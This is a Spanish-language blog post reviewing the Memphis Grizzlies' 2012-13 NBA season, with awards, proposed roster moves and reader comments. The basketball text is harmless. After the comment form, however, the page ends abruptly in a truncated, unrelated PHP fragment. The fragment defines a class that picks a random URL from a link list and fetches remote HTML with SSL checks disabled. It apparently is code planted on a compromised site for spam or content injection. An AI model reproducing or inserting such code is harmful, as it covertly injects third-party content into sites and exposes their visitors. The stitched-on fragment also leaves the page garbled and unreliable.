Memphis Grizzlies: Sobresaliente

18 de July de 2013 por Sancho88

Van a tardar muchos años en olvidar esta temporada los habitantes de Memphis. Por tercer año consecutivo el equipo se metió en Playoffs de la Conferencia Oeste superando ampliamente el 50% de victorias y demostrando que son un equipo mejorado con respecto a aquellos maravillosos años de Pau Gasol, Damon Stoudamire, James Posey, etc. Por orden de importancia enumeraremos algunos de sus logros esta temporada: consiguieron su mejor resultado histórico al alcanzar las finales del Oeste contra San Antonio (perdieron 4-0), el mejor balance victorias-derrotas de su historia en temporada regular (56-26), fueron el mejor equipo defensivo de la liga permitiendo tan solo 89,3 puntos en contra por partido, Marc Gasol consiguió el premio al mejor defensor del año, Tony Allen apareció en el mejor quinteto defensivo y Marc y Conley completaron el segundo mejor quinteto defensivo de la NBA. El catalán, además, también ocupó una plaza en el segundo mejor quinteto de la liga. Todo ello aderezado con el gran saber hacer de Lionel Hollins desde el banquillo, que lamentablemente no volverá a habitar la próxima temporada en tierras oseznas.

La salida de su entrenador es la única nota discordante en toda la orquesta de Memphis, pero una nota que puede echar al traste un proyecto ganador fabricado sobre unos cimientos ‘Made in Spain’. Porque la historia de Hollins en estos Grizzlies es la historia de la progresión serena pero constante de Marc Gasol. El pívot de Sant Boi es y ha sido durante toda la temporada el líder del equipo. Pese a la calamitosa barrida que sufrieron contra los Spurs por 4-0, Marc siempre estuvo al frente del equipo y demostró su caché como uno de los mejores pívots del momento. Quizá, solo Roy Hibbert y Joakim Noah estén ahora mismo al nivel del español, que ha forjado una alianza ganadora con Zach Randolph. Juntos se complementan a la perfección y forman la mejor pareja interior de la liga junto a David West y Roy Hibbert en los Pacers. Lo han demostrado de sobra, funcionan como una máquina perfectamente engrasada. Marc pone el juego en el poste alto, los bloqueos, la organización del equipo distribuyendo la pelota y la intimidación eterna defendiendo su aro. Zach es el nervio en el rebote ofensivo, el luchador incansable en el 1×1, el gran finalizador cerca de canasta. Por eso cobran lo que cobran y por eso ambos son codiciados por la mayoría de los equipos de la NBA. 

Con la salida de Rudy Gay a los Raptors a mitad de temporada, el equipo consiguió equilibrio defensivo gracias a la llegada de Tayshaun Prince, mayor profundidad en la rotación interior con Ed Davis y, sobre todo, reforzó el liderazgo en torno a la figura de Marc Gasol. A partir de ahí el equipo funcionó mucho mejor, los esquemas ofensivos de Hollins volvieron a fluir alrededor de su juego interior, dado que las sospechas sobre los últimos Playoffs del pasado año contra Clippers seguían instaladas en el aficionado ‘grizzlie’. Además, la salida de Gay tuvo un efecto positivo también en el impacto ofensivo de Tony Allen (ahora mismo el mejor defensor pequeño de la liga) y obligó a una maduración colectiva de Mike Conley, que demostró que no solo es un anotador y buen ‘ladrón’ defensivo, sino que puede organizar perfectamente un proyecto de tal envergadura.

No obstante, el gran trabajo defensivo del equipo quedó descompensado por un desequilibrio evidente en el lanzamiento exterior. Ese factor no fue tenido en cuenta por las estadísticas de John Hollinger y los Grizzlies pudieron superar a dos equipos endebles atrás en Playoffs como Clippers y Thunder, pero nunca a la muralla planteada por Greg Popovich. En tan solo 4 partidos los Grizzlies fueron historia. Partían con la vitola de favoritos en las finales del Oeste pero en el primer partido San Antonio los acribilló desde la línea de 7,25, y en los otros tres tan solo tuvieron que ajustar la defensa en algunos momentos puntuales y desarrollar dos movimientos ofensivos que liquidaron el gran entramado defensivo de los Grizzlies, inexistente en muchos momentos. Esos movimientos fueron el clásico Pick&Roll entre Parker y Duncan (que levante la mano el que jamás haya sido destrozado por estos dos bichos) y el típico ‘extra pass’ de Popovich para encontrar un jugador abierto en la esquina. Y es que una vez más los manuales antiguos llenos de polvo y guardados en el baúl de los recuerdos fueron más poderosos que esos nuevos manuales de estadística avanzada aplicada. Popovich es tan parco en palabras como efectivo en movimientos. El sistema Pop, unido al hundimiento de Mike Conley a partir de las segundas partes y a la desaparición en toda la serie de Zach Randolph, fueron los factores que explicaron claramente la eliminación de unos Grizzlies que, por lo demás, obtuvieron un resultado final francamente inmejorable. El problema es que éste parece ser su techo. Sobresaliente para los ositos.

PREMIOS

MVP: Marc Gasol. A sus 28 años Marc ha alcanzado su madurez deportiva. Es una buena edad para consolidarse en todas sus virtudes pero también, por qué no, para ir puliendo defectos. En su carrera nunca se cuestionó su IQ pero sí, y con bastante vehemencia además, su defensa en el 1×1. Ahora ya es incuestionable. A pesar de las quejas de Lebron James, Dwight Howard, etc., Marc se ha ganado todos los reconocimientos de la liga en base a unos méritos personales fuera de toda duda. Ha conseguido ser el primer jugador europeo en alzarse con un premio al mejor defensor de la NBA liderando desde atrás a la mejor defensa del campeonato. Con humildad, en su trofeo figura el nombre de todos sus compañeros y es que ese es el espíritu del juego defensivo, entenderlo como un entramado colectivo. Y no solo eso, Marc aparece en el segundo mejor quinteto de la temporada e, incomprensiblemente, también en el segundo mejor quinteto defensivo. Chapó por Marc. En el horizonte a corto – medio plazo debería plantearse participar en un equipo con aspiraciones al anillo, o exigir al nuevo ‘tacañón’ oficial del equipo, Robert Pera, tirar de chequera para apuntar alto en el mercado de agentes libres.

Rookie: Nos gustaría poner a Tony Wroten en este apartado, pero no podemos faltar a la verdad. Memphis estuvo yermo de nuevo baloncesto y al ex jugador de la Universidad de Washington aún le queda mucho por pulir. Es lo que puede pasar con los ‘freshman’ de la universidad. Un año bueno puede ser solo un espejismo o necesitar de mucho trabajo en adelante para triunfar en la NBA. Dejamos el premio huérfano de dueño, pero esperamos que el próximo año Wroten nos sorprenda por estos lares.

Sorpresa: Quincy Pondexter. Junto a Marc Gasol fue el único que dio la cara en la serie contra los Spurs. Por momentos todos los sistemas en ataque pasaban por sus manos. Y es que el alero de Washington nos sorprendió a todos yéndose hasta los 15 puntos por partido y más del 50% en acierto en Tiros de Campo durante la serie, unos números muy por encima de lo habitual. Sin comerlo ni beberlo, en Memphis han descubierto un posible alero titular. Aquí le damos un +1 al tema este de las estadísticas de Hollinger.

Decepción: Las finales del oeste que disputó Zach Randolph no le hacen mucha justicia a lo que fue el resto de su temporada, al igual que Mike Conley, que fue reducido a cenizas por Tony Parker. No obstante, si alguien nos ha decepcionado sobre manera es Robert Pera y todo su entramado de nuevos ejecutivos ‘súper tacañones’ y un poco cobardes, diría yo. Los movimientos que hacen suelen tener sentido pero dejar al capitán de la nave fuera del proyecto tras 4 años en los que ha llevado tres veces al equipo a Playoffs, dos veces a semifinales, una vez a la final, y siempre con porcentajes de más del 50% de victorias, es, cuanto menos, vergonzoso. Seguro que Dave Joerger será más modosito, y se aplicará al 100% en el estudio de estadísticas de la secta montada alrededor del PER de John Hollinger. Lástima que esta maquinita no resuelva partidos ni sepa qué hacer para parar a los rivales. Lionel Hollins sí lo sabía e incluso hizo todo lo posible por adaptarse al tema de la estadística avanzada, pero, sobre todo, fue el mentor de Marc Gasol, la persona que giraba la cabeza desaprobando al mediano de los Gasol cuando no defendía bien hace un par de años, pero también la persona que le inculcó un espíritu competitivo de máximo nivel a Marc. Gran error en la franquicia desprenderse de sus servicios. El nivel competitivo del equipo puede verse afectado muy seriamente con su salida.

Esfuerzo en vano: Lionel Hollins. Estaba en todas las quinielas para ocupar banquillos como el de los Clippers, Pelicans o incluso Celtics, pero la realidad es que se ha quedado fuera del circo. Seguramente sea primera opción para cualquier banquillo en cuanto caiga el D’Antoni de turno pero no se merecía acabar así después del magnífico trabajo que ha desarrollado durante estas últimas 4 temporadas en los Grizzlies. Se une al grupo de entrenadores agraviados comandado por George Karl. De injusticias está llena la vida.

JUGANDO A GM

El equipo será básicamente el mismo del año pasado con apenas algunos retoques. En el juego interior, por ejemplo, los Grizzlies han intercambiado a Darrell Arthur por Kostas Koufos. Se esperaba mucho más del ala-pívot, que verdaderamente no ha aportado prácticamente nada tras la vuelta de su lesión. De esta forma, el equipo queda blindado desde la segunda unidad con Davis y Koufos, jugadores que han sido titulares en otros momentos de sus carreras pero que deberán adaptarse y aprender de dos maestros de la zona como Zach y Marc. Leuer completará la rotación, aunque solo va a jugar los minutos de la basura

Ese será un año más el punto fuerte de estos Grizzlies, el juego interior. En la posición de alero, seguirá el dúo que tan buenos resultados dio el año pasado en defensa: Tayshaun Prince y Quincy Pondexter, aunque se espera que Donté Greene tenga por fin minutos y protagonismo, tras un año prácticamente fuera de las canchas por una fractura de tobillo. Si yo fuera GM aplicaría la team option sobre él, ya que puede aportar ciertas dosis de talento en ataque, y los Grizzlies no están sobrados en esa faceta. No aplicaría la team option sobre Willy Reed. A ver qué puede aportar también el letón Janis Timma. Carne de D-League de momento.

La dirección del equipo será un año más para Mike Conley. En principio, ni Bayless, ni Wroten son jugadores preparados para salir desde el banquillo y dirigir, sino que pueden adaptar mejor su juego como suplentes de Tony Allen. Al igual que el rookie Jamaal Franklin. Supuestamente, de ahí tiene que salir algún anotador fiable, algo de lo que adolece la plantilla. Por eso, sería ideal buscar un traspaso por Bayless, quien ejecutó su player option para jugar un año más con los Grizzlies. Intentaría un traspaso con los Wolves a cambio de Luke Ridnour, un jugador que se adaptaría perfectamente al estilo de juego de los Grizzlies y sería un director de garantías para Conley. Y si fallase ese movimiento, se podría buscar un traspaso con los Magic intercambiando a Bayless por Beno Udrih.

Así, el equipo quedaría:

Bases: Mike Conley, Ridnour o Udrih, Tony Wroten
Escoltas: Tony Allen, Jamaal Franklin
Aleros: Tayshaun Prince, Quincy Pondexter, Donté Greene, Janis Timma
Ala-pívots: Zach Randolph, Jon Leuer
Pívots: Marc Gasol, Ed Davis, Kostas Koufos

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Creo que los Grizzlies deberían apostar fuerte por el amnistiado Mike Miller, quizas a Skinny le guste volver a “casa” y los Grizzlies carecen de tiro exterior.

      Citar

  2. lost dice:
    #2

    Les costará mucho llegar a Semis de Conferencia este año. Creo que Lionel Hollins dotó a los Grizzlies de un estilo, de una defensa y de un espíritu de equipo que pocos lo podrían hacer, y de los que lo pueden hacer están en otros banquillos, o meneandosela en una piscina por Florida o California. Ahora mismo, veo tanto a San Antonio como a Thunder por encima, Houston a ver que tal hace encajar el equipo pero a priori me parece más completo; después ya se encuentra el grupo de Memphis con Clippers (puede que el mejor de este grupo), Warriors y Denver.
    Mike Miller en Memphis, ahora mismo, creo que sirve de poquito. No por su amenaza exterior (que no sabemos que nivel va a dar ya que no está en Miami y no le va servir jugar solo las Finales), que la necesitan, pero poner de SF a un tio que no puede defender ya me lo explicarás.
    Terrence Williams o Alan Anderson podrían ocupar el sitio de Pondexter, que ha dado un paso y será más importante este año en Memphis.
    Y por dentro un repartidor de estopa, Ivan Johnson me vale.

      Citar

  3. Denise dice:
    #3

    lost: Mike Miller en Memphis, ahora mismo, creo que sirve de poquito. No por su amenaza exterior (que no sabemos que nivel va a dar ya que no está en Miami y no le va servir jugar solo las Finales), que la necesitan, pero poner de SF a un tio que no puede defender ya me lo explicarás.Terrence Williams o Alan Anderson podrían ocupar el sitio de Pondexter, que ha dado un paso y será más importante este año en Memphis.Y por dentro un repartidor de estopa, Ivan Johnson me vale.

    No estoy de acuerdo.
    Para empezar, si fichan a Miller, será por poco dinero ya que este viene de la amnistía. Solo por tener a un tio contrastado que clava triples cobrando el minimo ya es un buen negocio.
    Sobre la defensa, obviamente le falta físico y fondo para defender a alto nivel, pero al menos simpre muestra actitud, lo cual es importante, además para defender al SF rival ya está Prince, éste es el que se tiene que desgastar contra los “treses rivales”. El rol de Miller en el equipo que caiga será el de jugar 12-18 minutos, quedarse en la esquina y clavar triples.
    El equipo que consiga ficharlo hará un gran fichaje.

      Citar

  4. Sancho88 dice:
    #4

    Austin Rivers sería un buen refuerzo para Memphis, porque parece que Tony Wroten no vale para la NBA, aunque se le puede dar la suplencia de Tony Allen a Jamaal Franklin, ciertamente. Memphis necesita un anotador desde el banquillo. O eso, o que Bayless asuma puntos sin excusas. Cómo le costó anotar el año pasado… A ver si ponen a jugar a Calathes como suplente de Conley. Me gusta bastante ese tío, defiende bien, manos rápidas, rápido para armar contraataques y juega en equipo, y tiene buena mano… ojalá que le den minutos

      Citar

  5. r_miller dice:
    #5

    Memphis sin Hollins se puede venir abajo o ganar un anillo a play-offs van a entrar cinco años seguidos, la cuestion es si para llegar a las finales o caer a primeras o en semifinales

      Citar

  6. Melo15 dice:
    #6

    Un anillo? Ni de broma, ahora mismo veo a Thunder, Spurs, Clippers, Rockets y Warriors por encima de ellos.
    Sin Hollins su defensa se va a resentir y en ataque no han mejorada nada.
    Marc no es un jugador que pueda cargar con el ataque de un equipo, tampoco Conley, y Randolph ya no es tan dominante como hace dos años.
    Yo no los veo pasando de 1r ronda.

      Citar

  7. rumbero dice:
    #7

    Melo15:
    Un anillo? Ni de broma, ahora mismo veo a Thunder, Spurs, Clippers, Rockets y Warriors por encima de ellos.
    Sin Hollins su defensa se va a resentir y en ataque no han mejorada nada.
    Marc no es un jugador que pueda cargar con el ataque de un equipo, tampoco Conley, y Randolph ya no es tan dominante como hace dos años.
    Yo no los veo pasando de 1r ronda.

    Que poco te gustan los ositos melo… La marcha de Hollins la van a notar pero Joerger ha sido estas temporadas el especialista defensivo así que la línea del equipo en este aspecto debería seguir más o menos igual. Han renovado baratísimo a Allen, han conseguido a Koufos como recambio de Marc a la vez que hacen hueco a Ed Davis con el traspaso de Arthur, se les reclamaba un par de tiradores y han pillado a Miller (y por el momento han rescatado a Akognon de los waivers). Creo que han añadido valor y opciones a su ataque sin olvidar que al final los que se la van a jugar la mayoría de veces son Zach, Conley y Marc. Y Zach hizo una auténtica mierda de final contra los Spurs pero fue mérito de la defensa a la que lo sometieron ahogándolo por completo. En 1r ronda se merendó a los Clippers y contra Thunder más de lo mismo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>